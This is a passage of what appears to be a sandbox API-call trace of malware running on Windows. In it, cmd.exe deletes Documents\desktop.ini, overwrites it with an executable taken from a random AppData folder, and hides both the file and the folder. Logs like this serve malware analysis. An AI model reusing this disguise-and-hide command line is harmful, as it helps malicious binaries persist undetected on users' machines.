\"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"" [0129.530] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"" [0129.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.531] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x381b78, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0129.531] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0129.531] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.531] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.531] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0129.531] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0129.531] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0129.531] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0129.531] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0129.531] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0129.531] _wcsicmp (_String1="PROMPT", 
_String2="RANDOM") returned -2 [0129.531] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0129.531] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0129.531] GetEnvironmentStringsW () returned 0x382568* [0129.531] FreeEnvironmentStringsW (penv=0x382568) returned 1 [0129.531] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.531] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.531] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0129.532] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0129.532] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0129.532] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0129.532] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0129.532] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0129.532] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0129.532] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0129.532] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f490 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.532] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f490, lpFilePart=0x26f48c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f48c*="Desktop") returned 0x18 [0129.532] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0129.532] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f20c | out: lpFindFileData=0x26f20c) returned 0x380bf8 [0129.532] FindClose (in: hFindFile=0x380bf8 | out: hFindFile=0x380bf8) returned 1 [0129.532] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f20c | out: lpFindFileData=0x26f20c) returned 
0x380bf8 [0129.532] FindClose (in: hFindFile=0x380bf8 | out: hFindFile=0x380bf8) returned 1 [0129.532] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f20c | out: lpFindFileData=0x26f20c) returned 0x380bf8 [0129.532] FindClose (in: hFindFile=0x380bf8 | out: hFindFile=0x380bf8) returned 1 [0129.533] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0129.533] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0129.533] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0129.533] GetEnvironmentStringsW () returned 0x380418* [0129.533] FreeEnvironmentStringsW (penv=0x380418) returned 1 [0129.533] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.533] GetConsoleOutputCP () returned 0x1b5 [0129.533] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.533] GetUserDefaultLCID () returned 0x409 [0129.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0129.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f5d0, cchData=128 | out: lpLCData="0") returned 2 [0129.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f5d0, cchData=128 | out: lpLCData="0") returned 2 [0129.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f5d0, cchData=128 | out: lpLCData="1") returned 2 [0129.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0129.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 
[0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0129.536] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0129.537] GetConsoleTitleW (in: lpConsoleTitle=0x370a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.537] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0129.537] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0129.537] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0129.537] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0129.538] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0129.538] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0129.538] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0129.538] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0129.538] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0129.538] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0129.538] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0129.540] _wcsicmp (_String1="del", _String2=")") returned 59 
[0129.540] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0129.540] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0129.540] _wcsicmp (_String1="IF", _String2="del") returned 5 [0129.540] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0129.540] _wcsicmp (_String1="REM", _String2="del") returned 14 [0129.540] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0129.542] _wcsicmp (_String1="type", _String2=")") returned 75 [0129.543] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0129.543] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0129.543] _wcsicmp (_String1="IF", _String2="type") returned -11 [0129.543] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0129.543] _wcsicmp (_String1="REM", _String2="type") returned -2 [0129.543] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0129.546] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0129.546] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0129.546] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0129.546] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0129.546] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0129.546] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0129.570] SetErrorMode (uMode=0x0) returned 0x0 [0129.570] SetErrorMode (uMode=0x1) returned 0x0 [0129.570] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x380420, lpFilePart=0x26ed84 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26ed84*="Desktop") returned 0x18 [0129.570] SetErrorMode (uMode=0x0) returned 0x1 [0129.570] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0129.570] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0129.575] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, 
nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.576] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eb00) returned 0xffffffff [0129.576] GetLastError () returned 0x2 [0129.576] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x26eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eb00) returned 0xffffffff [0129.576] GetLastError () returned 0x2 [0129.576] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eb00) returned 0x3824e8 [0129.576] FindClose (in: hFindFile=0x3824e8 | out: hFindFile=0x3824e8) returned 1 [0129.576] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eb00) returned 0xffffffff [0129.576] GetLastError () returned 0x2 [0129.576] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eb00) returned 0x3824e8 [0129.577] FindClose (in: hFindFile=0x3824e8 | out: hFindFile=0x3824e8) returned 1 [0129.577] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0129.577] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0129.577] GetConsoleTitleW (in: lpConsoleTitle=0x26eff8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.577] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ee80, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26ef48 | out: lpAttributeList=0x26ee80, lpSize=0x26ef48) 
returned 1 [0129.577] UpdateProcThreadAttribute (in: lpAttributeList=0x26ee80, dwFlags=0x0, Attribute=0x60001, lpValue=0x26ef40, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ee80, lpPreviousValue=0x0) returned 1 [0129.577] GetStartupInfoW (in: lpStartupInfo=0x26ee3c | out: lpStartupInfo=0x26ee3c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0129.577] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0129.578] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26eedc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26ef28 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" ", lpProcessInformation=0x26ef28*(hProcess=0x50, hThread=0x4c, dwProcessId=0x6dc, dwThreadId=0x140)) returned 1 [0129.623] CloseHandle (hObject=0x4c) returned 1 [0129.623] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0129.623] GetEnvironmentStringsW () returned 0x380838* [0129.623] FreeEnvironmentStringsW (penv=0x380838) returned 1 [0129.623] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0129.838] 
GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26ee1c | out: lpExitCode=0x26ee1c*=0x0) returned 1 [0129.838] CloseHandle (hObject=0x50) returned 1 [0129.838] _vsnwprintf (in: _Buffer=0x26ef64, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ee28 | out: _Buffer="00000000") returned 8 [0129.838] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0129.838] GetEnvironmentStringsW () returned 0x382558* [0129.838] FreeEnvironmentStringsW (penv=0x382558) returned 1 [0129.838] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0129.838] GetEnvironmentStringsW () returned 0x382558* [0129.838] FreeEnvironmentStringsW (penv=0x382558) returned 1 [0129.838] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ee80 | out: lpAttributeList=0x26ee80) [0129.838] GetConsoleTitleW (in: lpConsoleTitle=0x26f200, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.839] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e278, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x26e27c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e278*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0129.839] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0129.839] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0129.839] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0129.839] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\desktop.ini")) returned 0x20 [0129.839] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x11 [0129.839] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0129.839] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 
[0129.839] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\desktop.ini")) returned 0x20 [0129.840] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x3835e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3835e4) returned 0x382c78 [0129.840] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\desktop.ini")) returned 1 [0129.840] FindNextFileW (in: hFindFile=0x382c78, lpFindFileData=0x3835e4 | out: lpFindFileData=0x3835e4) returned 0 [0129.840] GetLastError () returned 0x12 [0129.840] FindClose (in: hFindFile=0x382c78 | out: hFindFile=0x382c78) returned 1 [0129.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.841] GetFileType (hFile=0x7) returned 0x2 [0129.841] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0129.841] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f39c | out: lpMode=0x26f39c) returned 1 [0129.841] _dup (_FileHandle=1) returned 3 [0129.841] _close (_FileHandle=1) returned 0 [0129.842] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini", _String2="con") returned -53 [0129.842] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f36c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0129.842] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0129.842] GetConsoleTitleW (in: lpConsoleTitle=0x26f19c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.842] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, 
lpFindFileData=0x26ed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ed00) returned 0x37e5e8 [0129.842] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0129.842] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0129.842] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0129.842] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26dc0c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0129.843] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0129.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.843] GetFileType (hFile=0x58) returned 0x1 [0129.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.843] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x26dc64 | out: lpFileSizeHigh=0x26dc64*=0x0) returned 0x7d600 [0129.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.843] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.843] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.843] GetFileType (hFile=0x50) returned 0x1 [0129.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.843] GetFileType (hFile=0x50) returned 0x1 [0129.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.843] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] GetFileType (hFile=0x50) returned 0x1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] GetFileType (hFile=0x50) returned 0x1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] GetFileType (hFile=0x50) returned 0x1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] GetFileType (hFile=0x50) returned 0x1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.845] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.845] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] GetFileType 
(hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 